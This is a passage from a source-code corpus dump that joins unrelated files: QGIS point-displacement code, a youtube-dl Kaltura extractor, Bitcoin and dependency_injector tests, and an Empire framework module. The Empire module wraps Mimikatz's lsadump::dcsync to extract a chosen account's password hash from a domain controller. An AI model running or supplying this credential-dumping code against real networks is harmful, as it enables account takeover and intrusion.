        # (and enters the spatial index) or joins the nearest existing one.
        clustered_groups = []
        group_index = {}
        group_locations = {}
        for current, f in enumerate(features):
            if feedback.isCanceled():
                break

            if not f.hasGeometry():
                continue

            point = f.geometry().asPoint()

            other_features_within_radius = index.intersects(searchRect(point))
            if not other_features_within_radius:
                index.addFeature(f)
                group = [f]
                clustered_groups.append(group)
                group_index[f.id()] = len(clustered_groups) - 1
                group_locations[f.id()] = point
            else:
                # find group with closest location to this point (may be more than one within search tolerance)
                min_dist_feature_id = other_features_within_radius[0]
                min_dist = group_locations[min_dist_feature_id].distance(point)
                for i in range(1, len(other_features_within_radius)):
                    candidate_id = other_features_within_radius[i]
                    new_dist = group_locations[candidate_id].distance(point)
                    if new_dist < min_dist:
                        min_dist = new_dist
                        min_dist_feature_id = candidate_id

                group_index_pos = group_index[min_dist_feature_id]
                group = clustered_groups[group_index_pos]

                # calculate new centroid of group
                old_center = group_locations[min_dist_feature_id]
                group_locations[min_dist_feature_id] = QgsPointXY((old_center.x() * len(group) + point.x()) / (len(group) + 1.0),
                                                                  (old_center.y() * len(group) + point.y()) / (len(group) + 1.0))
                # add to a group
                clustered_groups[group_index_pos].append(f)
                group_index[f.id()] = group_index_pos

            feedback.setProgress(int(current * total))

        # Phase 2: emit features, spreading each multi-member cluster
        # around a circle of `radius` centred on the cluster seed.
        current = 0
        total = 100.0 / len(clustered_groups) if clustered_groups else 1
        feedback.setProgress(0)

        fullPerimeter = 2 * math.pi

        for group in clustered_groups:
            if feedback.isCanceled():
                break

            count = len(group)
            if count == 1:
                # Singleton clusters pass through unchanged.
                sink.addFeature(group[0], QgsFeatureSink.FastInsert)
            else:
                angleStep = fullPerimeter / count
                if count == 2 and horizontal:
                    # Two-point horizontal layout: start at 90 degrees so the
                    # pair ends up side by side.
                    currentAngle = math.pi / 2
                else:
                    currentAngle = 0

                # The first member's recorded location is the cluster centre.
                old_point = group_locations[group[0].id()]
                for f in group:
                    if feedback.isCanceled():
                        break

                    sinusCurrentAngle = math.sin(currentAngle)
                    cosinusCurrentAngle = math.cos(currentAngle)
                    dx = radius * sinusCurrentAngle
                    dy = radius * cosinusCurrentAngle

                    # we want to keep any existing m/z values
                    point = f.geometry().constGet().clone()
                    point.setX(old_point.x() + dx)
                    point.setY(old_point.y() + dy)
                    f.setGeometry(QgsGeometry(point))

                    sink.addFeature(f, QgsFeatureSink.FastInsert)
                    currentAngle += angleStep

            current += 1
            feedback.setProgress(int(current * total))

        return {self.OUTPUT: dest_id}
| gpl-2.0 |
longman694/youtube-dl | youtube_dl/extractor/kaltura.py | 16 | 14151 | # coding: utf-8
from __future__ import unicode_literals
import re
import base64
from .common import InfoExtractor
from ..compat import (
compat_urlparse,
compat_parse_qs,
)
from ..utils import (
clean_html,
ExtractorError,
int_or_none,
unsmuggle_url,
smuggle_url,
)
class KalturaIE(InfoExtractor):
    # Matches both smuggled 'kaltura:<partner_id>:<entry_id>' URLs and the
    # flash/html5 embed-frame URLs served from kaltura.com.
    _VALID_URL = r'''(?x)
                (?:
                    kaltura:(?P<partner_id>\d+):(?P<id>[0-9a-z_]+)|
                    https?://
                        (:?(?:www|cdnapi(?:sec)?)\.)?kaltura\.com(?::\d+)?/
                        (?:
                            (?:
                                # flash player
                                index\.php/(?:kwidget|extwidget/preview)|
                                # html5 player
                                html5/html5lib/[^/]+/mwEmbedFrame\.php
                            )
                        )(?:/(?P<path>[^?]+))?(?:\?(?P<query>.*))?
                )
                '''
    _SERVICE_URL = 'http://cdnapi.kaltura.com'
    _SERVICE_BASE = '/api_v3/index.php'
    # See https://github.com/kaltura/server/blob/master/plugins/content/caption/base/lib/model/enums/CaptionType.php
    _CAPTION_TYPES = {
        1: 'srt',
        2: 'ttml',
        3: 'vtt',
    }
    _TESTS = [
        {
            'url': 'kaltura:269692:1_1jc2y3e4',
            'md5': '3adcbdb3dcc02d647539e53f284ba171',
            'info_dict': {
                'id': '1_1jc2y3e4',
                'ext': 'mp4',
                'title': 'Straight from the Heart',
                'upload_date': '20131219',
                'uploader_id': 'mlundberg@wolfgangsvault.com',
                'description': 'The Allman Brothers Band, 12/16/1981',
                'thumbnail': 're:^https?://.*/thumbnail/.*',
                'timestamp': int,
            },
        },
        {
            'url': 'http://www.kaltura.com/index.php/kwidget/cache_st/1300318621/wid/_269692/uiconf_id/3873291/entry_id/1_1jc2y3e4',
            'only_matching': True,
        },
        {
            'url': 'https://cdnapisec.kaltura.com/index.php/kwidget/wid/_557781/uiconf_id/22845202/entry_id/1_plr1syf3',
            'only_matching': True,
        },
        {
            'url': 'https://cdnapisec.kaltura.com/html5/html5lib/v2.30.2/mwEmbedFrame.php/p/1337/uiconf_id/20540612/entry_id/1_sf5ovm7u?wid=_243342',
            'only_matching': True,
        },
        {
            # video with subtitles
            'url': 'kaltura:111032:1_cw786r8q',
            'only_matching': True,
        },
        {
            # video with ttml subtitles (no fileExt)
            'url': 'kaltura:1926081:0_l5ye1133',
            'info_dict': {
                'id': '0_l5ye1133',
                'ext': 'mp4',
                'title': 'What Can You Do With Python?',
                'upload_date': '20160221',
                'uploader_id': 'stork',
                'thumbnail': 're:^https?://.*/thumbnail/.*',
                'timestamp': int,
                'subtitles': {
                    'en': [{
                        'ext': 'ttml',
                    }],
                },
            },
            'skip': 'Gone. Maybe https://www.safaribooksonline.com/library/tutorials/introduction-to-python-anon/3469/',
            'params': {
                'skip_download': True,
            },
        },
        {
            'url': 'https://www.kaltura.com/index.php/extwidget/preview/partner_id/1770401/uiconf_id/37307382/entry_id/0_58u8kme7/embed/iframe?&flashvars[streamerType]=auto',
            'only_matching': True,
        },
        {
            'url': 'https://www.kaltura.com:443/index.php/extwidget/preview/partner_id/1770401/uiconf_id/37307382/entry_id/0_58u8kme7/embed/iframe?&flashvars[streamerType]=auto',
            'only_matching': True,
        }
    ]

    @staticmethod
    def _extract_url(webpage):
        """Return a 'kaltura:partner_id:entry_id' URL for the first embed
        found in *webpage* (possibly smuggled with the embed's service
        URL), or None when no embed is present."""
        # Embed codes: https://knowledge.kaltura.com/embedding-kaltura-media-players-your-site
        mobj = (
            re.search(
                r"""(?xs)
                    kWidget\.(?:thumb)?[Ee]mbed\(
                    \{.*?
                        (?P<q1>['"])wid(?P=q1)\s*:\s*
                        (?P<q2>['"])_?(?P<partner_id>(?:(?!(?P=q2)).)+)(?P=q2),.*?
                        (?P<q3>['"])entry_?[Ii]d(?P=q3)\s*:\s*
                        (?P<q4>['"])(?P<id>(?:(?!(?P=q4)).)+)(?P=q4)(?:,|\s*\})
                """, webpage) or
            re.search(
                r'''(?xs)
                    (?P<q1>["'])
                        (?:https?:)?//cdnapi(?:sec)?\.kaltura\.com(?::\d+)?/(?:(?!(?P=q1)).)*\b(?:p|partner_id)/(?P<partner_id>\d+)(?:(?!(?P=q1)).)*
                    (?P=q1).*?
                    (?:
                        entry_?[Ii]d|
                        (?P<q2>["'])entry_?[Ii]d(?P=q2)
                    )\s*:\s*
                    (?P<q3>["'])(?P<id>(?:(?!(?P=q3)).)+)(?P=q3)
                ''', webpage) or
            re.search(
                r'''(?xs)
                    <iframe[^>]+src=(?P<q1>["'])
                      (?:https?:)?//(?:www\.)?kaltura\.com/(?:(?!(?P=q1)).)*\b(?:p|partner_id)/(?P<partner_id>\d+)
                      (?:(?!(?P=q1)).)*
                      [?&]entry_id=(?P<id>(?:(?!(?P=q1))[^&])+)
                    (?P=q1)
                ''', webpage)
        )
        if mobj:
            embed_info = mobj.groupdict()
            url = 'kaltura:%(partner_id)s:%(id)s' % embed_info
            escaped_pid = re.escape(embed_info['partner_id'])
            # The page may reference a non-default API host; smuggle it so
            # _real_extract queries the same host.
            service_url = re.search(
                r'<script[^>]+src=["\']((?:https?:)?//.+?)/p/%s/sp/%s00/embedIframeJs' % (escaped_pid, escaped_pid),
                webpage)
            if service_url:
                url = smuggle_url(url, {'service_url': service_url.group(1)})
            return url

    def _kaltura_api_call(self, video_id, actions, service_url=None, *args, **kwargs):
        """Issue one api_v3 call, or a multirequest batch when *actions*
        has more than one entry, and return the decoded JSON.

        Raises ExtractorError if the API answers with a
        KalturaAPIException object.
        """
        params = actions[0]
        if len(actions) > 1:
            # Batched actions are flattened into '<index>:<key>' params, as
            # the multirequest service expects.
            for i, a in enumerate(actions[1:], start=1):
                for k, v in a.items():
                    params['%d:%s' % (i, k)] = v

        data = self._download_json(
            (service_url or self._SERVICE_URL) + self._SERVICE_BASE,
            video_id, query=params, *args, **kwargs)

        status = data if len(actions) == 1 else data[0]
        if status.get('objectType') == 'KalturaAPIException':
            raise ExtractorError(
                '%s said: %s' % (self.IE_NAME, status['message']))

        return data

    def _get_video_info(self, video_id, partner_id, service_url=None):
        """Fetch entry metadata, flavor assets and captions for *video_id*
        via a single anonymous-session multirequest."""
        actions = [
            {
                'action': 'null',
                'apiVersion': '3.1.5',
                'clientTag': 'kdp:v3.8.5',
                'format': 1,  # JSON, 2 = XML, 3 = PHP
                'service': 'multirequest',
            },
            {
                'expiry': 86400,
                'service': 'session',
                'action': 'startWidgetSession',
                'widgetId': '_%s' % partner_id,
            },
            {
                'action': 'get',
                'entryId': video_id,
                'service': 'baseentry',
                'ks': '{1:result:ks}',
            },
            {
                'action': 'getbyentryid',
                'entryId': video_id,
                'service': 'flavorAsset',
                'ks': '{1:result:ks}',
            },
            {
                'action': 'list',
                'filter:entryIdEqual': video_id,
                'service': 'caption_captionasset',
                'ks': '{1:result:ks}',
            },
        ]
        return self._kaltura_api_call(
            video_id, actions, service_url, note='Downloading video info JSON')

    def _real_extract(self, url):
        """Resolve *url* (smuggled or embed form) to partner/entry ids,
        query the API for metadata, flavors and captions, and build the
        info dict."""
        url, smuggled_data = unsmuggle_url(url, {})

        mobj = re.match(self._VALID_URL, url)
        partner_id, entry_id = mobj.group('partner_id', 'id')
        ks = None
        captions = None
        if partner_id and entry_id:
            _, info, flavor_assets, captions = self._get_video_info(entry_id, partner_id, smuggled_data.get('service_url'))
        else:
            # Embed-frame URL: ids must be dug out of the path/query.
            path, query = mobj.group('path', 'query')
            if not path and not query:
                raise ExtractorError('Invalid URL', expected=True)
            params = {}
            if query:
                params = compat_parse_qs(query)
            if path:
                splitted_path = path.split('/')
                params.update(dict((zip(splitted_path[::2], [[v] for v in splitted_path[1::2]]))))
            if 'wid' in params:
                partner_id = params['wid'][0][1:]
            elif 'p' in params:
                partner_id = params['p'][0]
            elif 'partner_id' in params:
                partner_id = params['partner_id'][0]
            else:
                raise ExtractorError('Invalid URL', expected=True)
            if 'entry_id' in params:
                entry_id = params['entry_id'][0]
                _, info, flavor_assets, captions = self._get_video_info(entry_id, partner_id)
            elif 'uiconf_id' in params and 'flashvars[referenceId]' in params:
                reference_id = params['flashvars[referenceId]'][0]
                webpage = self._download_webpage(url, reference_id)
                entry_data = self._parse_json(self._search_regex(
                    r'window\.kalturaIframePackageData\s*=\s*({.*});',
                    webpage, 'kalturaIframePackageData'),
                    reference_id)['entryResult']
                info, flavor_assets = entry_data['meta'], entry_data['contextData']['flavorAssets']
                entry_id = info['id']
                # Unfortunately, data returned in kalturaIframePackageData lacks
                # captions so we will try requesting the complete data using
                # regular approach since we now know the entry_id
                try:
                    _, info, flavor_assets, captions = self._get_video_info(
                        entry_id, partner_id)
                except ExtractorError:
                    # Regular scenario failed but we already have everything
                    # extracted apart from captions and can process at least
                    # with this
                    pass
            else:
                raise ExtractorError('Invalid URL', expected=True)
            ks = params.get('flashvars[ks]', [None])[0]

        source_url = smuggled_data.get('source_url')
        if source_url:
            # Kaltura's CDN expects the embedding page's 'scheme://host'
            # base64-encoded as a 'referrer' query parameter.
            referrer = base64.b64encode(
                '://'.join(compat_urlparse.urlparse(source_url)[:2])
                .encode('utf-8')).decode('utf-8')
        else:
            referrer = None

        def sign_url(unsigned_url):
            # Append session key and referrer, when known, to a media URL.
            if ks:
                unsigned_url += '/ks/%s' % ks
            if referrer:
                unsigned_url += '?referrer=%s' % referrer
            return unsigned_url

        data_url = info['dataUrl']
        if '/flvclipper/' in data_url:
            data_url = re.sub(r'/flvclipper/.*', '/serveFlavor', data_url)

        formats = []
        for f in flavor_assets:
            # Continue if asset is not ready
            if f.get('status') != 2:
                continue
            # Original format that's not available (e.g. kaltura:1926081:0_c03e1b5g)
            # skip for now.
            if f.get('fileExt') == 'chun':
                continue
            if not f.get('fileExt'):
                # QT indicates QuickTime; some videos have broken fileExt
                if f.get('containerFormat') == 'qt':
                    f['fileExt'] = 'mov'
                else:
                    f['fileExt'] = 'mp4'
            video_url = sign_url(
                '%s/flavorId/%s' % (data_url, f['id']))
            # audio-only has no videoCodecId (e.g. kaltura:1926081:0_c03e1b5g
            # -f mp4-56)
            vcodec = 'none' if 'videoCodecId' not in f and f.get(
                'frameRate') == 0 else f.get('videoCodecId')
            formats.append({
                'format_id': '%(fileExt)s-%(bitrate)s' % f,
                'ext': f.get('fileExt'),
                'tbr': int_or_none(f['bitrate']),
                'fps': int_or_none(f.get('frameRate')),
                'filesize_approx': int_or_none(f.get('size'), invscale=1024),
                'container': f.get('containerFormat'),
                'vcodec': vcodec,
                'height': int_or_none(f.get('height')),
                'width': int_or_none(f.get('width')),
                'url': video_url,
            })
        if '/playManifest/' in data_url:
            # HLS manifest is available alongside the progressive flavors.
            m3u8_url = sign_url(data_url.replace(
                'format/url', 'format/applehttp'))
            formats.extend(self._extract_m3u8_formats(
                m3u8_url, entry_id, 'mp4', 'm3u8_native',
                m3u8_id='hls', fatal=False))

        self._sort_formats(formats)

        subtitles = {}
        if captions:
            for caption in captions.get('objects', []):
                # Continue if caption is not ready
                if caption.get('status') != 2:
                    continue
                if not caption.get('id'):
                    continue
                caption_format = int_or_none(caption.get('format'))
                subtitles.setdefault(caption.get('languageCode') or caption.get('language'), []).append({
                    'url': '%s/api_v3/service/caption_captionasset/action/serve/captionAssetId/%s' % (self._SERVICE_URL, caption['id']),
                    'ext': caption.get('fileExt') or self._CAPTION_TYPES.get(caption_format) or 'ttml',
                })

        return {
            'id': entry_id,
            'title': info['name'],
            'formats': formats,
            'subtitles': subtitles,
            'description': clean_html(info.get('description')),
            'thumbnail': info.get('thumbnailUrl'),
            'duration': info.get('duration'),
            'timestamp': info.get('createdAt'),
            'uploader_id': info.get('userId') if info.get('userId') != 'None' else None,
            'view_count': info.get('plays'),
        }
| unlicense |
zhuyue1314/Empire | lib/modules/credentials/mimikatz/dcsync.py | 3 | 2901 | from lib.common import helpers
class Module:
    """Empire module wrapper around PowerSploit's Invoke-Mimikatz
    lsadump::dcsync command (extracts an account's hash via DC
    replication, no code execution on the DC required)."""

    def __init__(self, mainMenu, params=None):
        """Build the module metadata/options and apply any [name, value]
        pairs supplied in *params*.

        *params* defaults to None (not a mutable []) so repeated
        instantiations never share state.
        """
        # Static metadata displayed by the Empire menus.
        self.info = {
            'Name': 'Invoke-Mimikatz DCsync',

            'Author': ['@gentilkiwi', '@JosephBialek'],

            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to extract a given account password through "
                            "Mimikatz's lsadump::dcsync module. This doesn't "
                            "need code execution on a given DC, but needs to be "
                            "run from a user context with DA equivalent privileges."),

            'Background' : True,

            'OutputExtension' : None,

            'NeedsAdmin' : False,

            'OpsecSafe' : True,

            'MinPSVersion' : '2',

            'Comments': [
                'http://blog.gentilkiwi.com',
                'http://clymb3r.wordpress.com/'
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'user' : {
                'Description'   :   'Username to extract the hash for (domain\\username format).',
                'Required'      :   True,
                'Value'         :   ''
            },
            'domain' : {
                'Description'   :   'Specified (fqdn) domain to pull for the primary domain/DC.',
                'Required'      :   False,
                'Value'         :   ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params or []:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):
        """Return the PowerShell payload: the Invoke-Mimikatz source with
        an appended lsadump::dcsync invocation, or "" if the source
        script cannot be read."""
        # read in the common module source code
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"

        try:
            # Context manager guarantees the handle is closed even if the
            # read itself fails part-way.
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            # Narrow except: the previous bare `except:` also swallowed
            # KeyboardInterrupt/SystemExit.
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        script = moduleCode
        script += "Invoke-Mimikatz -Command "
        script += "'\"lsadump::dcsync /user:" + self.options['user']['Value']

        if self.options["domain"]['Value'] != "":
            script += " /domain:" + self.options['domain']['Value']

        script += "\"';"

        return script
| bsd-3-clause |
SyndicateLtd/SyndicateQT | test/functional/feature_nulldummy.py | 4 | 5757 | #!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test NULLDUMMY softfork.
Connect to a single node.
Generate 2 blocks (save the coinbases for later).
Generate 427 more blocks.
[Policy/Consensus] Check that NULLDUMMY compliant transactions are accepted in the 430th block.
[Policy] Check that non-NULLDUMMY transactions are rejected before activation.
[Consensus] Check that the new NULLDUMMY rules are not enforced on the 431st block.
[Policy/Consensus] Check that the new NULLDUMMY rules are enforced on the 432nd block.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, network_thread_start
from test_framework.blocktools import create_coinbase, create_block, add_witness_commitment
from test_framework.script import CScript
from io import BytesIO
import time
NULLDUMMY_ERROR = "64: non-mandatory-script-verify-flag (Dummy CHECKMULTISIG argument must be zero)"
def trueDummy(tx):
    """Rewrite tx's first input scriptSig so that the CHECKMULTISIG dummy
    element (which must currently be empty) becomes OP_TRUE (0x51),
    making the transaction violate the NULLDUMMY rule. Re-hashes tx."""
    rewritten = []
    for element in CScript(tx.vin[0].scriptSig):
        if not rewritten:
            # First stack element is the dummy; it must be empty.
            assert(len(element) == 0)
            rewritten.append(b'\x51')
        else:
            rewritten.append(element)
    tx.vin[0].scriptSig = CScript(rewritten)
    tx.rehash()
class NULLDUMMYTest(BitcoinTestFramework):
    """Functional test exercising the NULLDUMMY softfork activation rules
    (policy vs consensus acceptance before/after block 431)."""

    def set_test_params(self):
        self.num_nodes = 1
        self.setup_clean_chain = True
        # This script tests NULLDUMMY activation, which is part of the 'segwit' deployment, so we go through
        # Must set the blockversion for this test
        # NOTE(review): the comment above mentions setting the block version,
        # but extra_args only whitelists localhost -- confirm against upstream.
        self.extra_args = [['-whitelist=127.0.0.1']]

    def run_test(self):
        """Drive the scenario described in the module docstring: build the
        chain to height 429, then probe mempool/block acceptance of
        NULLDUMMY-violating transactions around activation."""
        self.address = self.nodes[0].getnewaddress()
        self.ms_address = self.nodes[0].addmultisigaddress(1,[self.address])

        network_thread_start()
        self.coinbase_blocks = self.nodes[0].generate(2)  # Block 2
        coinbase_txid = []
        for i in self.coinbase_blocks:
            coinbase_txid.append(self.nodes[0].getblock(i)['tx'][0])
        self.nodes[0].generate(427)  # Block 429
        self.lastblockhash = self.nodes[0].getbestblockhash()
        self.tip = int("0x" + self.lastblockhash, 0)
        self.lastblockheight = 429
        self.lastblocktime = int(time.time()) + 429

        self.log.info("Test 1: NULLDUMMY compliant base transactions should be accepted to mempool and mined before activation [430]")
        test1txs = [self.create_transaction(self.nodes[0], coinbase_txid[0], self.ms_address, 49)]
        txid1 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[0].serialize_without_witness()), True)
        test1txs.append(self.create_transaction(self.nodes[0], txid1, self.ms_address, 48))
        txid2 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[1].serialize_without_witness()), True)
        self.block_submit(self.nodes[0], test1txs, True)

        self.log.info("Test 2: Non-NULLDUMMY base multisig transaction should not be accepted to mempool before activation")
        test2tx = self.create_transaction(self.nodes[0], txid2, self.ms_address, 48)
        trueDummy(test2tx)
        txid4 = self.tx_submit(self.nodes[0], test2tx, NULLDUMMY_ERROR)

        self.log.info("Test 3: Non-NULLDUMMY base transactions should be accepted in a block before activation [431]")
        self.block_submit(self.nodes[0], [test2tx], True)

        self.log.info("Test 4: Non-NULLDUMMY base multisig transaction is invalid after activation")
        test4tx = self.create_transaction(self.nodes[0], txid4, self.address, 47)
        test6txs=[CTransaction(test4tx)]
        trueDummy(test4tx)
        self.tx_submit(self.nodes[0], test4tx, NULLDUMMY_ERROR)
        self.block_submit(self.nodes[0], [test4tx])

        self.log.info("Test 6: NULLDUMMY compliant transactions should be accepted to mempool and in block after activation [432]")
        for i in test6txs:
            self.nodes[0].sendrawtransaction(bytes_to_hex_str(i.serialize_without_witness()), True)
        self.block_submit(self.nodes[0], test6txs, True)

    def create_transaction(self, node, txid, to_address, amount):
        """Spend output 0 of *txid* to *to_address*, sign via the node's
        wallet, and return the deserialized CTransaction."""
        inputs = [{ "txid" : txid, "vout" : 0}]
        outputs = { to_address : amount }
        rawtx = node.createrawtransaction(inputs, outputs)
        signresult = node.signrawtransaction(rawtx)
        tx = CTransaction()
        f = BytesIO(hex_str_to_bytes(signresult['hex']))
        tx.deserialize(f)
        return tx

    def tx_submit(self, node, tx, msg = ""):
        """Submit *tx* to the node's mempool; assert it is rejected with
        exactly *msg* (or accepted when msg is ""). Returns the txid."""
        tx.rehash()
        try:
            node.sendrawtransaction(bytes_to_hex_str(tx.serialize()), True)
        except JSONRPCException as exp:
            assert_equal(exp.error["message"], msg)
        else:
            assert_equal('', msg)
        return tx.hash

    def block_submit(self, node, txs, accept = False):
        """Mine *txs* into a block on top of the tracked tip and submit it;
        assert the node's best block does (accept=True) or does not
        change, updating the tracked tip state accordingly."""
        block = create_block(self.tip, create_coinbase(self.lastblockheight + 1), self.lastblocktime + 1)
        block.nVersion = 4
        for tx in txs:
            tx.rehash()
            block.vtx.append(tx)
        block.hashMerkleRoot = block.calc_merkle_root()
        block.rehash()
        block.solve()
        node.submitblock(bytes_to_hex_str(block.serialize()))
        if (accept):
            assert_equal(node.getbestblockhash(), block.hash)
            self.tip = block.sha256
            self.lastblockhash = block.hash
            self.lastblocktime += 1
            self.lastblockheight += 1
        else:
            assert_equal(node.getbestblockhash(), self.lastblockhash)
# Test entry point: run the scenario against a fresh single-node chain.
if __name__ == '__main__':
    NULLDUMMYTest().main()
| mit |
rmk135/objects | tests/unit/providers/test_coroutines_py35.py | 1 | 10067 | """Dependency injector coroutine providers unit tests."""
import asyncio
import unittest2 as unittest
from dependency_injector import (
providers,
errors,
)
# Runtime import to get asyncutils module
import os
_TOP_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../',
)),
)
import sys
sys.path.append(_TOP_DIR)
from asyncutils import AsyncTestCase
async def _example(arg1, arg2, arg3, arg4):
    """Test fixture coroutine: suspends once on an already-resolved
    future, then echoes its four arguments back as a tuple."""
    resolved = asyncio.Future()
    resolved.set_result(None)
    await resolved
    return (arg1, arg2, arg3, arg4)
def run(main):
    """Drive the awaitable *main* to completion on the current event loop
    and return its result."""
    return asyncio.get_event_loop().run_until_complete(main)
class CoroutineTests(AsyncTestCase):
    """Unit tests for the Coroutine provider."""

    def test_init_with_coroutine(self):
        self.assertTrue(providers.Coroutine(_example))

    def test_init_with_not_coroutine(self):
        self.assertRaises(errors.Error, providers.Coroutine, lambda: None)

    def test_call_with_positional_args(self):
        provider = providers.Coroutine(_example, 1, 2, 3, 4)
        self.assertTupleEqual(self._run(provider()), (1, 2, 3, 4))

    def test_call_with_keyword_args(self):
        provider = providers.Coroutine(_example,
                                       arg1=1, arg2=2, arg3=3, arg4=4)
        self.assertTupleEqual(self._run(provider()), (1, 2, 3, 4))

    def test_call_with_positional_and_keyword_args(self):
        provider = providers.Coroutine(_example,
                                       1, 2,
                                       arg3=3, arg4=4)
        # Consistency fix: use self._run() like every other test here
        # (previously this one alone used the module-level run() helper).
        self.assertTupleEqual(self._run(provider()), (1, 2, 3, 4))

    def test_call_with_context_args(self):
        provider = providers.Coroutine(_example, 1, 2)
        self.assertTupleEqual(self._run(provider(3, 4)), (1, 2, 3, 4))

    def test_call_with_context_kwargs(self):
        provider = providers.Coroutine(_example, arg1=1)
        self.assertTupleEqual(
            self._run(provider(arg2=2, arg3=3, arg4=4)),
            (1, 2, 3, 4),
        )

    def test_call_with_context_args_and_kwargs(self):
        provider = providers.Coroutine(_example, 1)
        self.assertTupleEqual(
            self._run(provider(2, arg3=3, arg4=4)),
            (1, 2, 3, 4),
        )

    def test_fluent_interface(self):
        provider = providers.Coroutine(_example) \
            .add_args(1, 2) \
            .add_kwargs(arg3=3, arg4=4)
        self.assertTupleEqual(self._run(provider()), (1, 2, 3, 4))

    def test_set_args(self):
        provider = providers.Coroutine(_example) \
            .add_args(1, 2) \
            .set_args(3, 4)
        self.assertEqual(provider.args, tuple([3, 4]))

    def test_set_kwargs(self):
        provider = providers.Coroutine(_example) \
            .add_kwargs(init_arg3=3, init_arg4=4) \
            .set_kwargs(init_arg3=4, init_arg4=5)
        self.assertEqual(provider.kwargs, dict(init_arg3=4, init_arg4=5))

    def test_clear_args(self):
        provider = providers.Coroutine(_example) \
            .add_args(1, 2) \
            .clear_args()
        self.assertEqual(provider.args, tuple())

    def test_clear_kwargs(self):
        provider = providers.Coroutine(_example) \
            .add_kwargs(init_arg3=3, init_arg4=4) \
            .clear_kwargs()
        self.assertEqual(provider.kwargs, dict())

    def test_call_overridden(self):
        provider = providers.Coroutine(_example)

        provider.override(providers.Object((4, 3, 2, 1)))
        provider.override(providers.Object((1, 2, 3, 4)))

        self.assertTupleEqual(provider(), (1, 2, 3, 4))

    def test_deepcopy(self):
        provider = providers.Coroutine(_example)

        provider_copy = providers.deepcopy(provider)

        self.assertIsNot(provider, provider_copy)
        self.assertIs(provider.provides, provider_copy.provides)
        self.assertIsInstance(provider, providers.Coroutine)

    def test_deepcopy_from_memo(self):
        provider = providers.Coroutine(_example)
        provider_copy_memo = providers.Coroutine(_example)

        provider_copy = providers.deepcopy(
            provider, memo={id(provider): provider_copy_memo})

        self.assertIs(provider_copy, provider_copy_memo)

    def test_deepcopy_args(self):
        provider = providers.Coroutine(_example)
        dependent_provider1 = providers.Callable(list)
        dependent_provider2 = providers.Callable(dict)

        provider.add_args(dependent_provider1, dependent_provider2)

        provider_copy = providers.deepcopy(provider)
        dependent_provider_copy1 = provider_copy.args[0]
        dependent_provider_copy2 = provider_copy.args[1]

        self.assertNotEqual(provider.args, provider_copy.args)

        self.assertIs(dependent_provider1.provides,
                      dependent_provider_copy1.provides)
        self.assertIsNot(dependent_provider1, dependent_provider_copy1)

        self.assertIs(dependent_provider2.provides,
                      dependent_provider_copy2.provides)
        self.assertIsNot(dependent_provider2, dependent_provider_copy2)

    def test_deepcopy_kwargs(self):
        provider = providers.Coroutine(_example)
        dependent_provider1 = providers.Callable(list)
        dependent_provider2 = providers.Callable(dict)

        provider.add_kwargs(a1=dependent_provider1, a2=dependent_provider2)

        provider_copy = providers.deepcopy(provider)
        dependent_provider_copy1 = provider_copy.kwargs['a1']
        dependent_provider_copy2 = provider_copy.kwargs['a2']

        self.assertNotEqual(provider.kwargs, provider_copy.kwargs)

        self.assertIs(dependent_provider1.provides,
                      dependent_provider_copy1.provides)
        self.assertIsNot(dependent_provider1, dependent_provider_copy1)

        self.assertIs(dependent_provider2.provides,
                      dependent_provider_copy2.provides)
        self.assertIsNot(dependent_provider2, dependent_provider_copy2)

    def test_deepcopy_overridden(self):
        provider = providers.Coroutine(_example)
        object_provider = providers.Object(object())

        provider.override(object_provider)

        provider_copy = providers.deepcopy(provider)
        object_provider_copy = provider_copy.overridden[0]

        self.assertIsNot(provider, provider_copy)
        self.assertIs(provider.provides, provider_copy.provides)
        self.assertIsInstance(provider, providers.Callable)

        self.assertIsNot(object_provider, object_provider_copy)
        self.assertIsInstance(object_provider_copy, providers.Object)

    def test_repr(self):
        provider = providers.Coroutine(_example)

        self.assertEqual(repr(provider),
                         '<dependency_injector.providers.'
                         'Coroutine({0}) at {1}>'.format(
                             repr(_example),
                             hex(id(provider))))
class DelegatedCoroutineTests(unittest.TestCase):
def test_inheritance(self):
self.assertIsInstance(providers.DelegatedCoroutine(_example),
providers.Coroutine)
def test_is_provider(self):
self.assertTrue(
providers.is_provider(providers.DelegatedCoroutine(_example)))
def test_is_delegated_provider(self):
provider = providers.DelegatedCoroutine(_example)
self.assertTrue(providers.is_delegated(provider))
def test_repr(self):
provider = providers.DelegatedCoroutine(_example)
self.assertEqual(repr(provider),
'<dependency_injector.providers.'
'DelegatedCoroutine({0}) at {1}>'.format(
repr(_example),
hex(id(provider))))
class AbstractCoroutineTests(AsyncTestCase):
    """Unit tests for the AbstractCoroutine provider (must be overridden
    by a concrete Coroutine before it can be called)."""

    def test_inheritance(self):
        self.assertIsInstance(providers.AbstractCoroutine(_example),
                              providers.Coroutine)

    def test_call_overridden_by_coroutine(self):
        # @asyncio.coroutine is the legacy coroutine decorator (removed in
        # Python 3.11); kept here for the py35 target of this test module.
        @asyncio.coroutine
        def _abstract_example():
            raise RuntimeError('Should not be raised')

        provider = providers.AbstractCoroutine(_abstract_example)
        provider.override(providers.Coroutine(_example))

        self.assertTrue(self._run(provider(1, 2, 3, 4)), (1, 2, 3, 4))

    def test_call_overridden_by_delegated_coroutine(self):
        @asyncio.coroutine
        def _abstract_example():
            raise RuntimeError('Should not be raised')

        provider = providers.AbstractCoroutine(_abstract_example)
        provider.override(providers.DelegatedCoroutine(_example))

